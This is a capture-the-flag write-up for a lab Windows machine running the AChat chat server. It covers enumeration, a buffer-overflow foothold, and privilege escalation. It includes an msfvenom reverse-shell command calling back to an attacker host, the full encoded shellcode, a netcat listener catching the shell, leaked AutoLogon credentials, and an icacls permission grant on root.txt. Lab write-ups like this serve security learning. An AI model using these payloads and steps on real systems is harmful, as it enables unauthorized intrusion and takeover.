ENUMERATION

9255/tcp open  http    syn-ack AChat chat system httpd
|_http-favicon: Unknown favicon MD5: 0B6115FAE5429FEB9A494BEE6B18ABBE
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open  achat   syn-ack AChat chat system

We cannot access the http site via browser for some reason. So after googling a bit I find this blog and search for Buffer Overflow exploits.

FOOTHOLD

We get 2 exploits from searchsploit and go for the non-Metasploit one:

┌──(kaliMaskdMafia)-[~/Downloads]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=1234 -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' -e x86/unicode_mixed BufferRegister=EAX -f python
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/unicode_mixed
x86/unicode_mixed succeeded with size 774 (iteration=0)
x86/unicode_mixed chosen with final size 774
Payload size: 774 bytes
Final size of python file: 3767 bytes
buf =  b""
buf += b"\x50\x50\x59\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49"
buf += b"\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41\x49\x41"
buf += b"\x49\x41\x49\x41\x49\x41\x6a\x58\x41\x51\x41\x44\x41"
buf += b"\x5a\x41\x42\x41\x52\x41\x4c\x41\x59\x41\x49\x41\x51"
buf += b"\x41\x49\x41\x51\x41\x49\x41\x68\x41\x41\x41\x5a\x31"
buf += b"\x41\x49\x41\x49\x41\x4a\x31\x31\x41\x49\x41\x49\x41"
buf += b"\x42\x41\x42\x41\x42\x51\x49\x31\x41\x49\x51\x49\x41"
buf += b"\x49\x51\x49\x31\x31\x31\x41\x49\x41\x4a\x51\x59\x41"
buf += b"\x5a\x42\x41\x42\x41\x42\x41\x42\x41\x42\x6b\x4d\x41"
buf += b"\x47\x42\x39\x75\x34\x4a\x42\x49\x6c\x79\x58\x65\x32"
buf += b"\x79\x70\x39\x70\x6b\x50\x61\x50\x61\x79\x77\x75\x50"
buf += b"\x31\x75\x70\x70\x64\x52\x6b\x72\x30\x30\x30\x74\x4b"
buf += b"\x71\x42\x7a\x6c\x72\x6b\x4e\x72\x4a\x74\x62\x6b\x44"
buf += b"\x32\x6c\x68\x5a\x6f\x47\x47\x4e\x6a\x6e\x46\x30\x31"
buf += b"\x39\x6f\x76\x4c\x4d\x6c\x63\x31\x51\x6c\x79\x72\x4c"
buf += b"\x6c\x4f\x30\x69\x31\x56\x6f\x5a\x6d\x69\x71\x59\x37"
buf += b"\x38\x62\x4c\x32\x30\x52\x62\x37\x52\x6b\x61\x42\x6a"
buf += b"\x70\x54\x4b\x70\x4a\x6d\x6c\x32\x6b\x70\x4c\x4e\x31"
buf += b"\x71\x68\x39\x53\x4f\x58\x6b\x51\x46\x71\x52\x31\x74"
buf += b"\x4b\x61\x49\x4b\x70\x6b\x51\x47\x63\x42\x6b\x31\x39"
buf += b"\x7a\x78\x69\x53\x4e\x5a\x51\x39\x34\x4b\x6e\x54\x74"
buf += b"\x4b\x79\x71\x6a\x36\x6c\x71\x59\x6f\x54\x6c\x46\x61"
buf += b"\x46\x6f\x5a\x6d\x39\x71\x58\x47\x30\x38\x39\x50\x34"
buf += b"\x35\x6a\x56\x69\x73\x31\x6d\x38\x78\x4f\x4b\x71\x6d"
buf += b"\x6d\x54\x30\x75\x68\x64\x72\x38\x62\x6b\x71\x48\x4b"
buf += b"\x74\x69\x71\x76\x73\x70\x66\x72\x6b\x4c\x4c\x6e\x6b"
buf += b"\x72\x6b\x51\x48\x6d\x4c\x4a\x61\x5a\x33\x72\x6b\x4d"
buf += b"\x34\x52\x6b\x4a\x61\x36\x70\x34\x49\x4e\x64\x6f\x34"
buf += b"\x6f\x34\x31\x4b\x6f\x6b\x71\x51\x4f\x69\x61\x4a\x72"
buf += b"\x31\x69\x6f\x77\x70\x4f\x6f\x61\x4f\x6e\x7a\x72\x6b"
buf += b"\x4e\x32\x5a\x4b\x62\x6d\x51\x4d\x71\x58\x6c\x73\x50"
buf += b"\x32\x4b\x50\x39\x70\x52\x48\x33\x47\x50\x73\x30\x32"
buf += b"\x71\x4f\x50\x54\x61\x58\x4e\x6c\x32\x57\x4b\x76\x49"
buf += b"\x77\x69\x6f\x76\x75\x78\x38\x44\x50\x69\x71\x4d\x30"
buf += b"\x4d\x30\x6f\x39\x56\x64\x51\x44\x72\x30\x32\x48\x4b"
buf += b"\x79\x75\x30\x30\x6b\x6b\x50\x59\x6f\x39\x45\x62\x30"
buf += b"\x50\x50\x70\x50\x62\x30\x6d\x70\x42\x30\x61\x30\x6e"
buf += b"\x70\x62\x48\x59\x5a\x6a\x6f\x57\x6f\x79\x50\x79\x6f"
buf += b"\x66\x75\x44\x57\x31\x5a\x4b\x55\x51\x58\x4a\x6a\x5a"
buf += b"\x6a\x6c\x4e\x6a\x66\x62\x48\x6d\x32\x49\x70\x5a\x64"
buf += b"\x39\x42\x44\x49\x39\x56\x4f\x7a\x4a\x70\x42\x36\x30"
buf += b"\x57\x53\x38\x54\x59\x55\x55\x70\x74\x6f\x71\x49\x6f"
buf += b"\x37\x65\x43\x55\x59\x30\x61\x64\x6a\x6c\x4b\x4f\x4e"
buf += b"\x6e\x6b\x58\x52\x55\x68\x6c\x33\x38\x78\x70\x66\x55"
buf += b"\x77\x32\x42\x36\x4b\x4f\x5a\x35\x51\x58\x72\x43\x42"
buf += b"\x4d\x31\x54\x39\x70\x43\x59\x6a\x43\x52\x37\x71\x47"
buf += b"\x52\x37\x4e\x51\x6c\x36\x31\x5a\x4e\x32\x4f\x69\x6e"
buf += b"\x76\x47\x72\x49\x6d\x33\x36\x58\x47\x4d\x74\x6b\x74"
buf += b"\x6d\x6c\x6d\x31\x4a\x61\x42\x6d\x51\x34\x6f\x34\x4a"
buf += b"\x70\x58\x46\x49\x70\x4d\x74\x62\x34\x70\x50\x42\x36"
buf += b"\x61\x46\x61\x46\x31\x36\x4f\x66\x6e\x6e\x52\x36\x32"
buf += b"\x36\x42\x33\x72\x36\x30\x68\x74\x39\x48\x4c\x4f\x4f"
buf += b"\x64\x46\x39\x6f\x68\x55\x51\x79\x37\x70\x70\x4e\x62"
buf += b"\x36\x4d\x76\x79\x6f\x4c\x70\x61\x58\x6b\x58\x43\x57"
buf += b"\x6b\x6d\x31\x50\x39\x6f\x77\x65\x55\x6b\x6a\x50\x35"
buf += b"\x65\x64\x62\x32\x36\x31\x58\x64\x66\x66\x35\x57\x4d"
buf += b"\x33\x6d\x49\x6f\x48\x55\x6f\x4c\x7a\x66\x61\x6c\x5a"
buf += b"\x6a\x33\x50\x6b\x4b\x39\x50\x30\x75\x6c\x45\x65\x6b"
buf += b"\x70\x47\x7a\x73\x54\x32\x50\x6f\x4f\x7a\x6b\x50\x52"
buf += b"\x33\x49\x6f\x5a\x35\x41\x41"

┌──(kaliMaskdMafia)-[~/Downloads]
└─$ python2 exploit.py
---->{P00F}!

And after executing the above commands we see that we have got a reverse shell back on our listener (P.S. We do have to execute quite a few times for this to work):

┌──(kaliMaskdMafia)-[~/Downloads]
└─$ nc -lnvp 1234                                                                 1 
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.74] 49158
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>cd ..
C:\Users\Alfred\Desktop

PRIVILEGE ESCALATION

Running winpeas we see these following notable results:

[?] Check if you can modify other users scheduled binaries https://book.hacktricks.xyz/windows/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries
    (CHATTERBOX\Alfred) Reset AChat service: "C:\Users\Alfred\AppData\Local\Microsoft\Windows Media\reset.bat" 
    Permissions file: Alfred [AllAccess]
    Permissions folder(DLL Hijacking): Alfred [AllAccess]

[+] Looking if you can modify any service registry
   [?] Check if you can modify the registry of a service https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#services-registry-permissions
    HKLM\system\currentcontrolset\services\Dnscache (Interactive [CreateSubKey], Users [CreateSubKey])
    HKLM\system\currentcontrolset\services\RpcEptMapper (Authenticated Users [CreateSubKey], Users [CreateSubKey])

[+] Looking for AutoLogon credentials
    Some AutoLogon credentials were found
    DefaultUserName               :  Alfred
    DefaultPassword               :  Welcome1!

We also see that we have access in Administrator’s Desktop however we cannot read root.txt

On searching for reasons we come across this thread of questions

And we can execute this command to get access to root.txt

C:\Users\Administrator\Desktop>icacls root.txt /t /c /GRANT Everyone:F
icacls root.txt /t /c /GRANT Everyone:F
processed file: root.txt
Successfully processed 1 files; Failed processing 0 files

C:\Users\Administrator\Desktop>more root.txt